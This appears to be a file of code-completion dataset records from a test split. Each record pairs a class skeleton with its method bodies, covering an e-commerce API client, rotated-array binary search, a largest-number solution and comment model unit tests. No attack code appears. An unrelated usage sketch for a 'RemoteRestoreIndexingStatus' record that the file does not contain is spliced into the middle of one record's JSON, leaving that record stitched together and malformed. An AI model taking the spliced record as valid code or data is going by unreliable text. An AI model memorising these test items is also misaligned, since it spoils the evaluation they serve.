get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n<|end_body_0|>\n\n<|body_start_1|>\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n<|end_body_1|>\n\n<|body_start_2|>\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000088", "length_bytes": 1426, "license_type": "no_license", "methods": [{"docstring": "获取单品 :return: gid", "name": "get_goods", "signature": "def get_goods(self)"}, 
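The RemoteRestoreIndexingStatus record above maps camelCase wire keys to snake_case attributes. A small usage sketch, assuming the record's class is in scope and that from_dictionary carries the @classmethod decorator it has in the upstream Cohesity SDK (the sparse skeleton format strips decorators); the payload values are hypothetical:

payload = {
    'endTimeUsecs': 1700000000000000,      # hypothetical epoch microseconds
    'startTimeUsecs': 1690000000000000,
    'indexingTaskStatus': 'kSuccess',      # hypothetical status value
}
status = RemoteRestoreIndexingStatus.from_dictionary(payload)
assert status.indexing_task_status == 'kSuccess'
assert status.indexing_task_uid is None   # absent key -> dictionary.get() gives None
assert RemoteRestoreIndexingStatus.from_dictionary(None) is None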
{"docstring": "获取单品价格和属性 :return:", "name": "get_price", "signature": "def get_price(self)"}, {"docstring": "获取评论列表 gid:产品id size:记录条数 page:页码 :return:", "name": "get_comment", "signature": "def get_comment(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002852", "prompt": "Implement the Python class `goods` described below.\n\nClass description:\nImplement the goods class.\n\nMethod signatures and docstrings:\n- def get_goods(self): 获取单品 :return: gid\n- def get_price(self): 获取单品价格和属性 :return:\n- def get_comment(self): 获取评论列表 gid:产品id size:记录条数 page:页码 :return:", "prompted_full_text": "Implement the Python class `goods` described below.\n\nClass description:\nImplement the goods class.\n\nMethod signatures and docstrings:\n- def get_goods(self): 获取单品 :return: gid\n- def get_price(self): 获取单品价格和属性 :return:\n- def get_comment(self): 获取评论列表 gid:产品id size:记录条数 page:页码 :return:\n\n<|skeleton|>\nclass goods:\n\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n <|body_0|>\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n <|body_1|>\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n<|end_body_0|>\n\n<|body_start_1|>\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n<|end_body_1|>\n\n<|body_start_2|>\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n<|end_body_2|>\n", "revision_id": "0ebaae335de2f1633e31c4fc3f60e556220a8bfb", "skeleton": "<|skeleton|>\nclass goods:\n\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n <|body_0|>\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n <|body_1|>\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class goods:\n def get_goods(self):\n \"\"\"获取单品 :return: gid\"\"\"\n url = host + '/api/goods/find'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品:', r)\n\n def get_price(self):\n \"\"\"获取单品价格和属性 :return:\"\"\"\n url = host + '/api/goods/line'\n data = {'sku': sku, 'gid': goods_id}\n r = requests.post(url=url, data=data).json()\n out_format('获取单品价格和属性:', r)\n return r\n\n def get_comment(self):\n \"\"\"获取评论列表 gid:产品id size:记录条数 page:页码 :return:\"\"\"\n url = host + '/api/goods/comment'\n data = {'gid': goods_id, 'size': '10', 'page': '1'}\n r = requests.post(url=url, json=data).json()\n out_format('获取评论列表:', r)\n return r\n", "source": "the_stack_v2_python_sparse", "source_path": "Atle/interface/framework/base/aGoods.py", "source_repo": "shiqi0128/My_scripts", "split": "test", "star_events_count": 0} {"blob_id": "3d86b31ad8ff1b0ae3aead31b19c2fe7da4941a0", "bodies": ["res = False\nif not nums:\n return False\npivot = self.find_pivot(nums, 0, len(nums) - 1)\nif pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\nelif nums[pivot] == target:\n res = pivot\nelif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\nelse:\n res = 
self.binary_search(nums, target, pivot + 1, len(nums) - 1)\nreturn res >= 0", "while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\nreturn -1", "if low > high:\n return -1\nif low == high:\n return low\nmid = int((low + high) / 2)\nif mid < high and nums[mid] > nums[mid + 1]:\n return mid\nelif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\nelif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\nelif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\nelse:\n return self.find_pivot(nums, mid + 1, high)", "if not nums:\n return False\nl, r = (0, len(nums) - 1)\nwhile l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\nreturn False"], "bodies_text": "<|body_start_0|>\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n<|end_body_0|>\n\n<|body_start_1|>\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n<|end_body_2|>\n\n<|body_start_3|>\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n<|end_body_3|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n <|body_1|>\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n <|body_2|>\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. 
Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n<|end_body_0|>\n\n<|body_start_1|>\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n<|end_body_2|>\n\n<|body_start_3|>\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000089", "length_bytes": 5178, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :type target: int :rtype: int", "name": "search", "signature": "def search(self, nums, target)"}, {"docstring": "Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:", "name": "binary_search", "signature": "def binary_search(self, nums, target, low, high)"}, {"docstring": "find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element", "name": "find_pivot", "signature": "def find_pivot(self, nums, low, high)"}, {"docstring": "Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid", "name": "search2", "signature": "def search2(self, nums: List[int], target: int) -> int"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002580", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def search(self, nums, target): :type nums: List[int] :type target: int :rtype: int\n- def binary_search(self, nums, target, low, high): Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\n- def find_pivot(self, nums, low, high): find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\n- def search2(self, nums: List[int], target: int) -> int: Binary search. 
When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def search(self, nums, target): :type nums: List[int] :type target: int :rtype: int\n- def binary_search(self, nums, target, low, high): Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\n- def find_pivot(self, nums, low, high): find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\n- def search2(self, nums: List[int], target: int) -> int: Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\n\n<|skeleton|>\nclass Solution:\n\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n <|body_1|>\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n <|body_2|>\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. 
Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n<|end_body_0|>\n\n<|body_start_1|>\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n<|end_body_1|>\n\n<|body_start_2|>\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n<|end_body_2|>\n\n<|body_start_3|>\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n<|end_body_3|>\n", "revision_id": "a5b02044ef39154b6a8d32eb57682f447e1632ba", "skeleton": "<|skeleton|>\nclass Solution:\n\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n <|body_1|>\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n <|body_2|>\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. 
Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def search(self, nums, target):\n \"\"\":type nums: List[int] :type target: int :rtype: int\"\"\"\n res = False\n if not nums:\n return False\n pivot = self.find_pivot(nums, 0, len(nums) - 1)\n if pivot == -1 or pivot == len(nums) - 1:\n res = self.binary_search(nums, target, 0, len(nums) - 1)\n elif nums[pivot] == target:\n res = pivot\n elif nums[0] <= target:\n res = self.binary_search(nums, target, 0, pivot)\n else:\n res = self.binary_search(nums, target, pivot + 1, len(nums) - 1)\n return res >= 0\n\n def binary_search(self, nums, target, low, high):\n \"\"\"Standard binary search in an array with distinct elements :param nums: :param target: :param low: :param high: :return:\"\"\"\n while low <= high:\n mid = int((low + high) / 2)\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n\n def find_pivot(self, nums, low, high):\n \"\"\"find the index of the pivot element in the array; :param nums: :param low: :param high: :return: for [3, 4, 5, 6, 1, 2]. return 3 (the index of 6) if it is fully sorted, return the last element\"\"\"\n if low > high:\n return -1\n if low == high:\n return low\n mid = int((low + high) / 2)\n if mid < high and nums[mid] > nums[mid + 1]:\n return mid\n elif mid > low and nums[mid] < nums[mid - 1]:\n return mid - 1\n elif nums[mid] < nums[low]:\n return self.find_pivot(nums, low, mid - 1)\n elif nums[mid] == nums[low]:\n return self.find_pivot(nums, low + 1, high)\n else:\n return self.find_pivot(nums, mid + 1, high)\n\n def search2(self, nums: List[int], target: int) -> int:\n \"\"\"Binary search. When there are duplicates, the sorted half cannot be identified when nums[0] == nums[mid]. 
Therefore, the left pointer can only be moved to the right by 1 instead of moving to mid\"\"\"\n if not nums:\n return False\n l, r = (0, len(nums) - 1)\n while l <= r:\n mid = l + (r - l) // 2\n if nums[mid] == target:\n return True\n if nums[l] < nums[mid]:\n if nums[l] <= target < nums[mid]:\n r = mid - 1\n else:\n l = mid + 1\n elif nums[l] > nums[mid]:\n if nums[mid] < target <= nums[r]:\n l = mid + 1\n else:\n r = mid - 1\n else:\n l += 1\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "algo/binary_search/search_in_rotated_array_II.py", "source_repo": "xys234/coding-problems", "split": "test", "star_events_count": 0} {"blob_id": "32375c144ac9769a1fdd8a7233902032f042ba3e", "bodies": ["def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\nnums = sorted(map(str, nums), key=cmp_to_key(compare))\nif nums[0] == '0':\n return '0'\nreturn ''.join(nums)", "def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\nnums.sort(key=func, reverse=True)\nif not nums[0]:\n return '0'\nreturn ''.join(map(str, nums))"], "bodies_text": "<|body_start_0|>\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n <|body_0|>\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000090", "length_bytes": 1302, "license_type": "no_license", "methods": [{"docstring": "比较", "name": "largestNumber", "signature": "def largestNumber(self, nums: List[int]) -> str"}, {"docstring": "数学", "name": "largestNumberMath", "signature": "def largestNumberMath(self, nums: List[int]) -> str"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004914", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def largestNumber(self, nums: List[int]) -> str: 比较\n- def largestNumberMath(self, nums: List[int]) -> str: 数学", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def largestNumber(self, nums: List[int]) -> str: 比较\n- def largestNumberMath(self, nums: List[int]) -> str: 数学\n\n<|skeleton|>\nclass Solution:\n\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n <|body_0|>\n\n def 
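A quick check of the two approaches in the rotated-array record just completed, assuming its Solution class is in scope (the annotations need `from typing import List`). Note that both methods return booleans even though search2 is annotated `-> int`; the record's own docstring explains why duplicates force the `l += 1` fallback when nums[l] == nums[mid]:

sol = Solution()
assert sol.search([4, 5, 6, 7, 0, 1, 2], 0) is True      # pivot at index 3, target right of it
assert sol.search2([2, 5, 6, 0, 0, 1, 2], 3) is False
assert sol.search2([1, 0, 1, 1, 1], 0) is True           # exercises the l += 1 branch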
largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n<|end_body_1|>\n", "revision_id": "52756b30e9d51794591aca030bc918e707f473f1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n <|body_0|>\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def largestNumber(self, nums: List[int]) -> str:\n \"\"\"比较\"\"\"\n def compare(x, y):\n \"\"\" 比较函数,从大到小排序 \"\"\"\n if y + x > x + y:\n return 1\n return -1\n nums = sorted(map(str, nums), key=cmp_to_key(compare))\n if nums[0] == '0':\n return '0'\n return ''.join(nums)\n\n def largestNumberMath(self, nums: List[int]) -> str:\n \"\"\"数学\"\"\"\n def func(x):\n if not x:\n return 0\n n = int(math.log10(x)) + 1\n return x / (10 ** n - 1)\n nums.sort(key=func, reverse=True)\n if not nums[0]:\n return '0'\n return ''.join(map(str, nums))\n", "source": "the_stack_v2_python_sparse", "source_path": "179.最大数/solution.py", "source_repo": "QtTao/daily_leetcode", "split": "test", "star_events_count": 0} {"blob_id": "d2fab9ca0cc3718d9c1d09da823c2187a3ad9aac", "bodies": ["post = create_a_post()\nwith self.assertRaises(TypeError):\n comment = Comment.create(post=post)", "post = create_a_post()\nwith self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")", "post = create_a_post()\ncomment = Comment.create(body=\"I'm a comment without a parent\", post=post)\nself.assertIs(comment.parent, None)", "post = create_a_post()\nparent = Comment.create(body=\"I'm a parent comment\", post=post)\ncomment = Comment.create(body=\"I'm a child comment\", parent=parent)\nself.assertIs(comment.post, parent.post)", "post = create_a_post()\nparent = Comment.create(body=\"I'm a parent comment\", post=post)\ncomment = Comment.create(body=\"I'm a child comment\", parent=parent)\nself.assertIsNotNone(comment.post)"], "bodies_text": "<|body_start_0|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n<|end_body_1|>\n\n<|body_start_2|>\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n<|end_body_2|>\n\n<|body_start_3|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n<|end_body_3|>\n\n<|body_start_4|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n<|end_body_4|>\n", "class_docstring": "", "class_name": "CommentModelTests", 
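The largest-number record above offers two orderings. The comparator version ranks by pairwise concatenation (y + x > x + y). One way to read the math variant: for a d-digit x, x / (10**d - 1) is the value of the infinite repetition 0.xxx... (3 -> 3/9 = 0.333..., 30 -> 30/99 = 0.3030...), and comparing repetitions decides concatenation order. A check, assuming the record's Solution class plus its implied imports (math, functools.cmp_to_key, typing.List) are in scope:

sol = Solution()
assert sol.largestNumber([3, 30, 34, 5, 9]) == '9534330'
assert sol.largestNumberMath([3, 30, 34, 5, 9]) == '9534330'
assert sol.largestNumberMath([0, 0]) == '0'   # all-zero input collapses to '0'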
"detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CommentModelTests:\n\n def test_create_comment_missing_kwarg_raises_type_error(self):\n \"\"\"Not passing a required kwarg like body should raise type error\"\"\"\n <|body_0|>\n\n def test_create_comment_either_parent_or_post_must_be_kwarg(self):\n \"\"\"If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\"\"\"\n <|body_1|>\n\n def test_create_comment_parent_is_none_when_post_is_kwarg(self):\n \"\"\"A comment's 'parent' field should be none when 'post' is passed as a kwarg\"\"\"\n <|body_2|>\n\n def test_post_matches_parent_when_parent_is_comment(self):\n \"\"\"A comment's 'post'field should match its parent it when has a non-None parent\"\"\"\n <|body_3|>\n\n def test_post_is_not_none_when_parent_is_kwarg(self):\n \"\"\"A comment's post field should not be none when parent is passed in as a a kwarg to create()\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n comment = Comment.create(post=post)\n<|end_body_0|>\n\n<|body_start_1|>\n post = create_a_post()\n with self.assertRaises(TypeError):\n Comment.create(body=\"This shouldn't work\")\n<|end_body_1|>\n\n<|body_start_2|>\n post = create_a_post()\n comment = Comment.create(body=\"I'm a comment without a parent\", post=post)\n self.assertIs(comment.parent, None)\n<|end_body_2|>\n\n<|body_start_3|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIs(comment.post, parent.post)\n<|end_body_3|>\n\n<|body_start_4|>\n post = create_a_post()\n parent = Comment.create(body=\"I'm a parent comment\", post=post)\n comment = Comment.create(body=\"I'm a child comment\", parent=parent)\n self.assertIsNotNone(comment.post)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000091", "length_bytes": 13696, "license_type": "permissive", "methods": [{"docstring": "Not passing a required kwarg like body should raise type error", "name": "test_create_comment_missing_kwarg_raises_type_error", "signature": "def test_create_comment_missing_kwarg_raises_type_error(self)"}, {"docstring": "If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised", "name": "test_create_comment_either_parent_or_post_must_be_kwarg", "signature": "def test_create_comment_either_parent_or_post_must_be_kwarg(self)"}, {"docstring": "A comment's 'parent' field should be none when 'post' is passed as a kwarg", "name": "test_create_comment_parent_is_none_when_post_is_kwarg", "signature": "def test_create_comment_parent_is_none_when_post_is_kwarg(self)"}, {"docstring": "A comment's 'post'field should match its parent it when has a non-None parent", "name": "test_post_matches_parent_when_parent_is_comment", "signature": "def test_post_matches_parent_when_parent_is_comment(self)"}, {"docstring": "A comment's post field should not be none when parent is passed in as a a kwarg to create()", "name": "test_post_is_not_none_when_parent_is_kwarg", "signature": "def test_post_is_not_none_when_parent_is_kwarg(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_004757", "prompt": "Implement the Python class `CommentModelTests` described below.\n\nClass description:\nImplement the CommentModelTests class.\n\nMethod signatures and docstrings:\n- def 
test_create_comment_missing_kwarg_raises_type_error(self): Not passing a required kwarg like body should raise type error\n- def test_create_comment_either_parent_or_post_must_be_kwarg(self): If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\n- def test_create_comment_parent_is_none_when_post_is_kwarg(self): A comment's 'parent' field should be none when 'post' is passed as a kwarg\n- def test_post_matches_parent_when_parent_is_comment(self): A comment's 'post'field should match its parent it when has a non-None parent\n- def test_post_is_not_none_when_parent_is_kwarg(self): A comment's post field should not be none when parent is passed in as a a kwarg to create()", "prompted_full_text": "Implement the Python class `CommentModelTests` described below.\n\nClass description:\nImplement the CommentModelTests class.\n\nMethod signatures and docstrings:\n- def test_create_comment_missing_kwarg_raises_type_error(self): Not passing a required kwarg like body should raise type error\n- def test_create_comment_either_parent_or_post_must_be_kwarg(self): If neither 'parent' nor 'post' are passed as kwarg keys, a TypeError should be raised\n- def test_create_comment_parent_is_none_when_post_is_kwarg(self): A comment's 'parent' field should be none when 'post' is passed as a kwarg\n- def test_post_matches_parent_when_parent_is_comment(self): A comment's 'post'field should match its parent it when has a non-None parent\n- def 